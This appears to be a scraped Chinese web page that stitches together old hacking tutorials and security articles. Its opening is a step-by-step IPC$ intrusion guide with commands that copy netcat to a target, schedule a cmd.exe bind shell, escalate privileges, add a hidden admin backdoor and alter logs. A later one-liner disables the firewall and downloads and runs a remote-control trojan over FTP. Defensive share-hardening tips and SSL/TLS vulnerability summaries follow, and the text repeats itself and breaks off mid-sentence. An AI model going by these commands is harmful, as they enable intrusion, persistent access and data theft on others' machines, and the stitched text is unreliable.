IPC是Internet Process Connection的縮寫(xiě),也就是遠程網(wǎng)絡(luò )連接。
它是Windows NT及Windows 2000特有的一項功能,特點(diǎn)是在同一時(shí)間內,兩個(gè)IP之間只允許建立一個(gè)連接。好了,廢話(huà)少說(shuō),現在進(jìn)入主題。
如何找到具有IPC漏洞的主機呢?以前我都是組合一個(gè)國外的掃描工具(名字我忘了)和KillUSA的LetMeIn,因為很多工作都是手工完成的,所以速度可想而知了。現在因為有了小榕的流光2000,所以找到這樣的主機實(shí)在是太簡(jiǎn)單了,具體操作我就不說(shuō)了,大家可以參考該軟件的說(shuō)明文檔。
好了,假設我們已經(jīng)找到了一臺這樣的主機,地址是139.223.200.xxx,管理員帳號是Administrator,密碼是123456。進(jìn)入命令行方式,正式開(kāi)工。
需要說(shuō)明的是,以下操作都是在目標主機沒(méi)有禁止遠程IPC$連接和啟動(dòng)Schedule服務(wù)的理想情況下進(jìn)行的。 F:\>net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator" 命令成功完成。
F:\>copy nc.exe \\139.223.200.xxx\admin$ 已復制 1 個(gè)文件。 F:\>net time \\139.223.200.xxx \\139.223.200.xxx 的當前時(shí)間是 2000/12/25 上午 10:25 在 \\139.223.200.xxx 的本地時(shí)間 (GMT - 07:00) 是 2000/12/25 上午10:35 命令成功完成。
F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 新增加了一項作業(yè),其作業(yè) ID = 0 F:\>telnet 139.223.200.xxx 1234 上面的命令很簡(jiǎn)單,你只要參考一下net,at和nc的用法就可以了。這樣,我們就登上了遠程的主機。
最理想的情況是這樣的,但是,也許你會(huì )遇到目標主機的Schedule服務(wù)沒(méi)有啟動(dòng)的情況,那么,at命令就不能用了,我們就需要增加以下步驟。 F:\>at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe 服務(wù)仍未啟動(dòng)。
F:\>netsvc \\139.223.200.xxx schedule /start Service is running on \\139.223.200.xxx 登上遠程主機之后,我們可以做什么呢?這要視這個(gè)帳號的權限以及該主機的安全策略來(lái)決定。如果你的權限不夠的話(huà),可以試試下面的步驟。
首先在本地執行下面的命令。 F:\>copy getadmin.exe \\139.223.200.xxx\admin$ 已復制 1 個(gè)文件。
F:\>copy gasys.dll \\139.223.200.xxx\admin$ 已復制 1 個(gè)文件。 其次,在遠程主機運行下面的命令。
C:\WINNT\system32>getadmin 如果成功的話(huà),你就是這臺主機的管理員了,權限夠大了吧?:-) 那么,現在我們能做什么呢?改主頁(yè)?下載SAM數據庫?都可以啦!方法有很多,我就不一一說(shuō)了,具體方法可以參考相關(guān)教程。我一般對目標主機上的WORD文檔和數據庫比較感興趣,呵呵。
其實(shí),如果你在這臺機子上面放個(gè)木馬或者病毒什么的東東,做起事來(lái)更容易一些,但是我覺(jué)得如果你跟他沒(méi)什么深仇大恨的話(huà),還是不要這么做了,這樣不好。 作完了你要做的事,不要忘了做個(gè)后門(mén)。
C:\WINNT\system32>net user Guest 30906766 net use Guest 30906766 The command completed successfully. C:\WINNT\system32>net localgroup administrators Guest /add net localgroup administrators Guest /add The command completed successfully. 這是個(gè)比較簡(jiǎn)單的后門(mén),要想做的更好一些,可以象Linux那樣,做出一套RootKits來(lái),其實(shí)這樣的東東目前已經(jīng)有了,你只要拿來(lái)用就可以了。現在搞破壞真是簡(jiǎn)單多了,那么多的傻瓜工具任你用,哎!要想自保,不學(xué)點(diǎn)安全知識怎么行呢? 最后,我們得修理一下日志。
雖然Redp0wer告訴我很少管理員會(huì )看NT的日志,但是我想修理一下還是有用的。NT的日志在什么地方呢?可以參考XUDI的文章。
但是有一點(diǎn)要記住的是,日志只能修改,不能刪除,否則就是自己把自己出賣(mài)了!:-)這方面的命令行工具也不少,你可以到一些國外的站點(diǎn)去看看。 其實(shí)有了這臺主機,你還可以做的更多。
智慧+毅力+靈感=成功,這是我的經(jīng)驗。
IPC漏洞攻擊是一個(gè)很早的漏洞了,現在基本不好使了,可以簡(jiǎn)單給你介紹幾個(gè)命令,用虛擬機實(shí)驗一下,千萬(wàn)別干壞事。
首先,空連接漏洞必須139.445端口打開(kāi),如果不打開(kāi),那是不成的
一般情況下139端口都是打開(kāi)的,呵呵。可以通過(guò)流光,X-scan等掃描工具來(lái)掃一下,如果存在漏洞直接空連接即可
命令:(192.168.0.12這個(gè)地址是捏造的)
net use \\192.168.0.12\ipc$ "" /user:administrator
如果成功連接會(huì )提示的
net use z: \\192.168.0.12\c$
把對方的c盤(pán)隱射到本地的z盤(pán),在我的電腦里面就可以看到對方的c盤(pán)了.
刪除與對方的ipc連接:
net use \\192.168.0.12\ipc$ /del
上傳木馬,控制關(guān)機,設定從其,就能隨你操作了,這種就不教你了~呵呵
IPC漏洞攻擊是一個(gè)很早的漏洞了,現在基本不好使了,可以簡(jiǎn)單給你介紹幾個(gè)命令,用虛擬機實(shí)驗一下,千萬(wàn)別干壞事。
首先,空連接漏洞必須139.445端口打開(kāi),如果不打開(kāi),那是不成的一般情況下139端口都是打開(kāi)的,呵呵。可以通過(guò)流光,X-scan等掃描工具來(lái)掃一下,如果存在漏洞直接空連接即可命令:(192.168.0.12這個(gè)地址是捏造的)net use \\192.168.0.12\ipc$ "" /user:administrator如果成功連接會(huì )提示的net use z: \\192.168.0.12\c$把對方的c盤(pán)隱射到本地的z盤(pán),在我的電腦里面就可以看到對方的c盤(pán)了.刪除與對方的ipc連接:net use \\192.168.0.12\ipc$ /del上傳木馬,控制關(guān)機,設定從其,就能隨你操作了,這種就不教你了。
孫子兵法上說(shuō),知己知彼,百戰不殆。要想有效的防范黑客對我們電腦的入侵和破壞,僅僅被動(dòng)的安裝防火墻是顯然不夠的,我們更應該了解一些常見(jiàn)的黑客入侵手法,針對不同的方法采取不同的措施,做到有的放矢。
1、iis漏洞入侵
由于寬帶越來(lái)越普及,給自己的win2000或是xp裝上簡(jiǎn)單易學(xué)的iis,搭建一個(gè)不定時(shí)開(kāi)放的ftp或是web站點(diǎn),相信是不少電腦愛(ài)好者所向往的,而且應該也已經(jīng)有很多人這樣做了。
利用iis的webdav漏洞攻擊成功后的界面這里的systen32就指的是對方機器的系統文件夾了,也就是說(shuō)黑客此刻執行的任何命令,都是在被入侵的機器上運行的。這個(gè)時(shí)候如果執行format命令,危害就可想而知了,用netuser命令添加帳戶(hù)也是輕而易舉的。如下圖:
應對措施:關(guān)注微軟官方站點(diǎn),及時(shí)安裝iis的漏洞補丁。
2、木馬入侵
木馬也許是廣大電腦愛(ài)好者最深?lèi)和唇^的東東了,相信不少朋友都受到過(guò)它的騷擾。木馬有可能是黑客在已經(jīng)獲取我們操作系統可寫(xiě)權限的前提下,由黑客上傳的(例如下面會(huì )提到的ipc$共享入侵);也可能是我們?yōu)g覽了一些垃圾個(gè)人站點(diǎn)而通過(guò)網(wǎng)頁(yè)瀏覽感染的(利用了IE漏洞);當然,最多的情況還是我們防范意識不強,隨便運行了別人發(fā)來(lái)的所謂的mm圖片、好看的動(dòng)畫(huà)之類(lèi)的程序或者是在不正規的網(wǎng)站上隨便下載軟件使用。應對措施:提高防范意識,不要隨意運行別人發(fā)來(lái)的軟件。安裝木馬查殺軟件,及時(shí)更新木馬特征庫。推薦使用thecleaner,木馬克星。
3、網(wǎng)頁(yè)惡意代碼入侵
在我們?yōu)g覽網(wǎng)頁(yè)的時(shí)候不可避免的會(huì )遇到一些不正規的網(wǎng)站,它們經(jīng)常會(huì )擅自修改瀏覽者的注冊表,其直接體現便是修改IE的默認主頁(yè),鎖定注冊表,修改鼠標右鍵菜單等等。實(shí)際上絕大部分的網(wǎng)頁(yè)惡意代碼都是通過(guò)修改我們的注冊表達到目的。只要保護好自己的注冊表,就一切ok了。應對措施:安裝具有注冊表實(shí)時(shí)監控功能的防護軟件,做好注冊表的備份工作。禁用RemoteRegistryService服務(wù),不要上一些不該上的網(wǎng)站。
4、ipc$共享入侵
微軟在win2000,xp中設置的這個(gè)功能對個(gè)人用戶(hù)來(lái)說(shuō)幾乎毫無(wú)用處。反而成了黑客入侵nt架構操作系統的一條便利通道。如果你的操作系統存在不安全的口令,那就更可怕了。一條典型的入侵流程如下:
(1)用任何辦法得到一個(gè)帳戶(hù)與口令(猜測,破解),網(wǎng)上流傳有一個(gè)叫做smbcrack的軟件就是利用ipc$來(lái)破解帳戶(hù)口令的。如果你的密碼位數不高,又很簡(jiǎn)單,是很容易被破解的。根據我的個(gè)人經(jīng)驗,相當多的人都將administrator的口令設為123,2003,或者干脆不設密碼。
(2)使用命令netuse\xxx.xxx.xxx.xxxipc$“密碼”/user:“用戶(hù)名”建立一個(gè)有一定權限的ipc$連接。用copytrojan.exe\xxx.xxx.xxx.xxxadmin$將木馬程序的服務(wù)器端復制到系統目錄下。
(3)用nettime\xxx.xxx.xxx.xxx命令查看對方操作系統的時(shí)間,然后用at\202.xxx.xxx.xxx12:00trojan.exe讓trojan.exe在指定時(shí)間運行。這樣一來(lái),你的電腦就完全被黑客控制了。
應對措施:禁用server服務(wù),TaskScheduler服務(wù),去掉網(wǎng)絡(luò )文件和打印機共享前的對勾,當然,給自己的帳戶(hù)加上強壯的口令才是最關(guān)鍵的。如下圖:
IPC$(Internet Process Connection)是共享"命名管道"的資源,它是為了讓進(jìn)程間通信而開(kāi)放的命名管道,通過(guò)提供可信任的用戶(hù)名和口令,連接雙方可以建立安全的通道并以此通道進(jìn)行加密數據的交換,從而實(shí)現對遠程計算機的訪(fǎng)問(wèn)。IPC$是NT/2000的一項新功能,它有一個(gè)特點(diǎn),即在同一時(shí)間內,兩個(gè)IP之間只允許建立一個(gè)連接。NT/2000在提供了ipc$功能的同時(shí),在初次安裝系統時(shí)還打開(kāi)了默認共享,即所有的邏輯共享(c$,d$,e$……)和系統目錄winnt或windows(admin$)共享。所有的這些,微軟的初衷都是為了方便管理員的管理,但在有意無(wú)意中,導致了系統安全性的降低。
平時(shí)我們總能聽(tīng)到有人在說(shuō)ipc$漏洞,ipc$漏洞,其實(shí)ipc$并不是一個(gè)真正意義上的漏洞,我想之所以有人這么說(shuō),一定是指微軟自己安置的那個(gè)‘后門(mén)’,黑客就是利用了這一個(gè)漏洞。
禁止默認共享
察看本地共享資源
運行-cmd-輸入net share
刪除共享(每次輸入一個(gè))
net share ipc$ /delete
net share admin$ /delete
net share c$ /delete
net share d$ /delete(如果有e,f,。。可以繼續刪除)
不過(guò)重起以后還有就要修改注冊表了
修改注冊表HKEY_LOCAL_MACHIN
E\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters增加AutoShareWks子鍵(REG_DWORD),鍵值為0。
1、獲取口令 這又有三種方法:一是通過(guò)網(wǎng)絡(luò )監聽(tīng)非法得到用戶(hù)口令,這類(lèi)方法有一定的局限性,但危害性極大,監聽(tīng)者往往能夠獲得其所在網(wǎng)段的所有用戶(hù)賬號和口令,對局域網(wǎng)安全威脅巨大;二是在知道用戶(hù)的賬號后(如電子郵件@前面的部分)利用一些專(zhuān)門(mén)軟件強行破解用戶(hù)口令,這種方法不受網(wǎng)段限制,但黑客要有足夠的耐心和時(shí)間;三是在獲得一個(gè)服務(wù)器上的用戶(hù)口令文件(此文件成為Shadow文件)后,用暴力破解程序破解用戶(hù)口令,該方法的使用前提是黑客獲得口令的Shadow文件。
此方法在所有方法中危害最大,因為它不需要像第二種方法那樣一遍又一遍地嘗試登錄服務(wù)器,而是在本地將加密后的口令與Shadow文件中的口令相比較就能非常容易地破獲用戶(hù)密碼,尤其對那些弱智用戶(hù)(指口令安全系數極低的用戶(hù),如某用戶(hù)賬號為zys,其口令就是zys666、666666、或干脆就是zys等)更是在短短的一兩分鐘內,甚至幾十秒內就可以將其干掉。 2、放置特洛伊木馬程序 特洛伊木馬 程序可以直接侵入用戶(hù)的電腦并進(jìn)行破壞,它常被偽裝成工具程序或者游戲等誘使用戶(hù)打開(kāi)帶有特洛伊木馬程序的郵件附件或從網(wǎng)上直接下載,一旦用戶(hù)打開(kāi)了這些 郵件的附件或者執行了這些程序之后,它們就會(huì )象古特洛伊人在敵人城外留下的藏滿(mǎn)士兵的木馬一樣留在自己的電腦中,并在自己的計算機系統中隱藏一個(gè)可以在Windows啟動(dòng)時(shí)悄悄執行的程序。
當您連接到因特網(wǎng)上時(shí),這個(gè)程序就會(huì )通知黑客,來(lái)報告您的IP地址以及預先設定的端口。黑客在收到這些信息后,再利用這個(gè)潛伏在其中的程序,就可以任意地修改您的計算機的參數設定、復制文件、窺視你整個(gè)硬盤(pán)中的內容等,從而達到控制你的計算機的目的。
3、WWW的欺騙技術(shù) 在網(wǎng)上用戶(hù)可以利用IE等瀏覽器進(jìn)行各種各樣的WEB站點(diǎn)的訪(fǎng)問(wèn),如閱讀新聞組、咨詢(xún)產(chǎn)品價(jià)格、訂閱報紙、電子商務(wù)等。然而一般的用戶(hù)恐怕不會(huì )想到有這些問(wèn)題存在:正在訪(fǎng)問(wèn)的網(wǎng)頁(yè)已經(jīng)被黑客篡改過(guò),網(wǎng)頁(yè)上的信息是虛假的!例如黑客將用戶(hù)要瀏覽的網(wǎng)頁(yè)的URL改寫(xiě)為指向黑客自己的服務(wù)器,當用戶(hù)瀏覽目標網(wǎng)頁(yè)的時(shí)候,實(shí)際上是向黑客服務(wù)器發(fā)出請求,那么黑客就可以達到欺騙的目的了。
4、電子郵件攻擊 電子郵件攻擊主要表現為兩種方式:一是電子郵件轟炸和電子郵件“滾雪球”,也就是通常所說(shuō)的郵件炸彈,指的是用偽造的IP地址和電子郵件地址向同一信箱發(fā)送數以千計、萬(wàn)計甚至無(wú)窮多次的內容相同的垃圾郵件,致使受害人郵箱被“炸”, 嚴重者可能會(huì )給電子郵件服務(wù)器操作系統帶來(lái)危險,甚至癱瘓;二是電子郵件欺騙,攻擊者佯稱(chēng)自己為系統管理員(郵件地址和系統管理員完全相同),給用戶(hù)發(fā)送 郵件要求用戶(hù)修改口令(口令可能為指定字符串)或在貌似正常的附件中加載病毒或其他木馬程序(據筆者所知,某些單位的網(wǎng)絡(luò )管理員有定期給用戶(hù)免費發(fā)送防火 墻升級程序的義務(wù),這為黑客成功地利用該方法提供了可乘之機),這類(lèi)欺騙只要用戶(hù)提高警惕,一般危害性不是太大。 5、通過(guò)一個(gè)節點(diǎn)來(lái)攻擊其他節點(diǎn) 黑客在突破一臺主機后,往往以此主機作為根據地,攻擊其他主機(以隱蔽其入侵路徑,避免留下蛛絲馬跡)。
他們可以使用網(wǎng)絡(luò )監聽(tīng)方法,嘗試攻破同一網(wǎng)絡(luò )內的其他主機;也可以通過(guò)IP欺騙和主機信任關(guān)系,攻擊其他主機。這類(lèi)攻擊很狡猾,但由于某些技術(shù)很難掌握,如IP欺騙,因此較少被黑客使用。
6、網(wǎng)絡(luò )監聽(tīng) 網(wǎng)絡(luò )監聽(tīng)是主機的一種工作模式,在這種模式下,主機可以接受到本網(wǎng)段在同一條物理通道上傳輸的所有信息,而不管這些信息的發(fā)送方和接受方是誰(shuí)。此時(shí),如果兩臺主機進(jìn)行通信的信息沒(méi)有加密,只要使用某些網(wǎng)絡(luò )監聽(tīng)工具,例如NetXray for windows 95/98/nt,sniffit for linux 、solaries等就可以輕而易舉地截取包括口令和帳號在內的信息資料。
雖然網(wǎng)絡(luò )監聽(tīng)獲得的用戶(hù)帳號和口令具有一定的局限性,但監聽(tīng)者往往能夠獲得其所在網(wǎng)段的所有用戶(hù)帳號及口令。 7、尋找系統漏洞 許多系統都有這樣那樣的安全漏洞(Bugs),其中某些是操作系統或應用軟件本身具有的,如Sendmail漏洞,win98中的共享目錄密碼驗證漏洞和IE5漏洞等,這些漏洞在補丁未被開(kāi)發(fā)出來(lái)之前一般很難防御黑客的破壞,除非你將網(wǎng)線(xiàn)拔掉;還有一些漏洞是由于系統管理員配置錯誤引起的,如在網(wǎng)絡(luò )文件系統中,將目錄和文件以可寫(xiě)的方式調出,將未加Shadow的用戶(hù)密碼文件以明碼方式存放在某一目錄下,這都會(huì )給黑客帶來(lái)可乘之機,應及時(shí)加以修正。
8、利用帳號進(jìn)行攻擊 有的黑客會(huì )利用操作系統提供的缺省賬戶(hù)和密碼進(jìn)行攻擊,例如許多UNIX主機都有FTP和Guest等缺省賬戶(hù)(其密碼和賬戶(hù)名同名),有的甚至沒(méi)有口令。黑客用Unix操作系統提供的命令如Finger和Ruser等收集信息,不斷提高自己的攻擊能力。
這類(lèi)攻擊只要系統管理員提高警惕,將系統提供的缺省賬戶(hù)關(guān)掉或提醒無(wú)口令用戶(hù)增加口令一般都能克服。 9、偷取特權 利用各種特洛伊木馬程序、后門(mén)程序和黑客自己編寫(xiě)的導致緩沖區溢出的程序進(jìn)行攻擊,前者可使黑客非法獲得對用戶(hù)機器的完全控制權,后者可使黑客獲得超級用戶(hù)的權限,從而擁有。
使用AT命令提權
AT 9:00 net user 123 /add
然后放到管理員組
這個(gè)就提權了
用FTP下載鴿子也可以,
%windir%\system32\cmd.exe /c c:\&net stop sharedaccess&echo open 域名> t.t&echo 用戶(hù)>>t.t&echo 密碼>>t.t&echo get mm.exe c:\mm.exe >> t.t&echo bye >> t.t&ftp -s:t.t&del t.t&c:\mm.exe
SSL/TLS漏洞目前還是比較普遍的,首先關(guān)閉協(xié)議:SSL2、SSL3(比較老的SSL協(xié)議)配置完成ATS安全標準就可以避免以下的攻擊了,最新的服務(wù)器環(huán)境都不會(huì )有一下問(wèn)題,當然這種漏洞都是自己部署證書(shū)沒(méi)有配置好導致的。
Export 加密算法Export是一種老舊的弱加密算法,是被美國法律標示為可出口的加密算法,其限制對稱(chēng)加密最大強度位數為40位,限制密鑰交換強度為最大512位。這是一個(gè)現今被強制丟棄的算法。
Downgrade(降級攻擊)降級攻擊是一種對計算機系統或者通信協(xié)議的攻擊,在降級攻擊中,攻擊者故意使系統放棄新式、安全性高的工作方式,反而使用為向下兼容而準備的老式、安全性差的工作方式,降級攻擊常被用于中間人攻擊,講加密的通信協(xié)議安全性大幅削弱,得以進(jìn)行原本不可能做到的攻擊。 在現代的回退防御中,使用單獨的信號套件來(lái)指示自愿降級行為,需要理解該信號并支持更高協(xié)議版本的服務(wù)器來(lái)終止協(xié)商,該套件是TLS_FALLBACK_SCSV(0x5600)MITM(中間人攻擊)MITM(Man-in-the-MiddleAttack) ,是指攻擊者與通訊的兩端分別創(chuàng )建獨立的聯(lián)系,并交換其所有收到的數據,使通訊的兩端認為他們正在通過(guò)一個(gè)私密的連接與對方直接對話(huà),但事實(shí)上整個(gè)對話(huà)都被攻擊者完全控制,在中間人攻擊中,攻擊者可以攔截通訊雙方的通話(huà)并插入新的內容。
一個(gè)中間人攻擊能成功的前提條件是攻擊者能夠將自己偽裝成每個(gè)參與會(huì )話(huà)的終端,并且不被其他終端識破。BEAST(野獸攻擊)BEAST(CVE-2011-3389) BEAST是一種明文攻擊,通過(guò)從SSL/TLS加密的會(huì )話(huà)中獲取受害者的COOKIE值(通過(guò)進(jìn)行一次會(huì )話(huà)劫持攻擊),進(jìn)而篡改一個(gè)加密算法的 CBC(密碼塊鏈)的模式以實(shí)現攻擊目錄,其主要針對TLS1.0和更早版本的協(xié)議中的對稱(chēng)加密算法CBC模式。
RC4 加密算法由于早期的BEAST野獸攻擊而采用的加密算法,RC4算法能減輕野獸攻擊的危害,后來(lái)隨著(zhù)客戶(hù)端版本升級,有了客戶(hù)端緩解方案(Chrome 和 Firefox 提供了緩解方案),野獸攻擊就不是什么大問(wèn)題了。同樣這是一個(gè)現今被強制丟棄的算法。
CRIME(罪惡攻擊)CRIME(CVE-2012-4929),全稱(chēng)Compression Ratio Info-leak Made Easy,這是一種因SSL壓縮造成的安全隱患,通過(guò)它可竊取啟用數據壓縮特性的HTTPS或SPDY協(xié)議傳輸的私密Web Cookie。在成功讀取身份驗證Cookie后,攻擊者可以實(shí)行會(huì )話(huà)劫持和發(fā)動(dòng)進(jìn)一步攻擊。
SSL 壓縮在下述版本是默認關(guān)閉的: nginx 1.1.6及更高/1.0.9及更高(如果使用了 OpenSSL 1.0.0及更高), nginx 1.3.2及更高/1.2.2及更高(如果使用較舊版本的 OpenSSL)。如果你使用一個(gè)早期版本的 nginx 或 OpenSSL,而且你的發(fā)行版沒(méi)有向后移植該選項,那么你需要重新編譯沒(méi)有一個(gè) ZLIB 支持的 OpenSSL。
這會(huì )禁止 OpenSSL 使用 DEFLATE 壓縮方式。如果你禁用了這個(gè),你仍然可以使用常規的 HTML DEFLATE 壓縮。
Heartbleed(心血漏洞)Heartbleed(CVE-2014-0160) 是一個(gè)于2014年4月公布的 OpenSSL 加密庫的漏洞,它是一個(gè)被廣泛使用的傳輸層安全(TLS)協(xié)議的實(shí)現。無(wú)論是服務(wù)器端還是客戶(hù)端在 TLS 中使用了有缺陷的 OpenSSL,都可以被利用該缺陷。
由于它是因 DTLS 心跳擴展(RFC 6520)中的輸入驗證不正確(缺少了邊界檢查)而導致的,所以該漏洞根據“心跳”而命名。這個(gè)漏洞是一種緩存區超讀漏洞,它可以讀取到本不應該讀取的數據。
如果使用帶缺陷的Openssl版本,無(wú)論是服務(wù)器還是客戶(hù)端,都可能因此受到攻擊。POODLE漏洞(卷毛狗攻擊)2014年10月14號由Google發(fā)現的POODLE漏洞,全稱(chēng)是Padding Oracle On Downloaded Legacy Encryption vulnerability,又被稱(chēng)為“貴賓犬攻擊”(CVE-2014-3566),POODLE漏洞只對CBC模式的明文進(jìn)行了身份驗證,但是沒(méi)有對填充字節進(jìn)行完整性驗證,攻擊者竊取采用SSL3.0版加密通信過(guò)程中的內容,對填充字節修改并且利用預置填充來(lái)恢復加密內容,以達到攻擊目的。
TLS POODLE(TLS卷毛狗攻擊)TLS POODLE(CVE-2014-8730) 該漏洞的原理和POODLE漏洞的原理一致,但不是SSL3協(xié)議。由于TLS填充是SSLv3的一個(gè)子集,因此可以重新使用針對TLS的POODLE攻擊。
TLS對于它的填充格式是非常嚴格的,但是一些TLS實(shí)現在解密之后不執行填充結構的檢查。即使使用TLS也不會(huì )容易受到POODLE攻擊的影響。
CCSCCS(CVE-2014-0224) 全稱(chēng)openssl MITM CCS injection attack,Openssl 0.9.8za之前的版本、1.0.0m之前的以及1.0.1h之前的openssl沒(méi)有適當的限制ChangeCipherSpec信息的處理,這允許中間人攻擊者在通信之間使用0長(cháng)度的主密鑰。FREAKFREAK(CVE-2015-0204) 客戶(hù)端會(huì )在一個(gè)全安全強度的RSA握手過(guò)程中接受使用弱安全強度的出口RSA密鑰,其中關(guān)鍵在于客戶(hù)端并沒(méi)有允許協(xié)商任何出口級別的RSA密碼套件。
LogjamLogjam(CVE-2015-4000) 使用 Diffie-Hellman 密鑰交換協(xié)議的 TLS 連接很容易受到攻擊,尤其是DH密鑰中的公鑰強度小于1024bits。中間人攻擊者可將有漏洞的 TLS 連接降級至使用 512 字節導出級加密。
這種攻。
聲明:本網(wǎng)站尊重并保護知識產(chǎn)權,根據《信息網(wǎng)絡(luò )傳播權保護條例》,如果我們轉載的作品侵犯了您的權利,請在一個(gè)月內通知我們,我們會(huì )及時(shí)刪除。
蜀ICP備2020033479號-4 Copyright ? 2016 學(xué)習?shū)B(niǎo). 頁(yè)面生成時(shí)間:3.687秒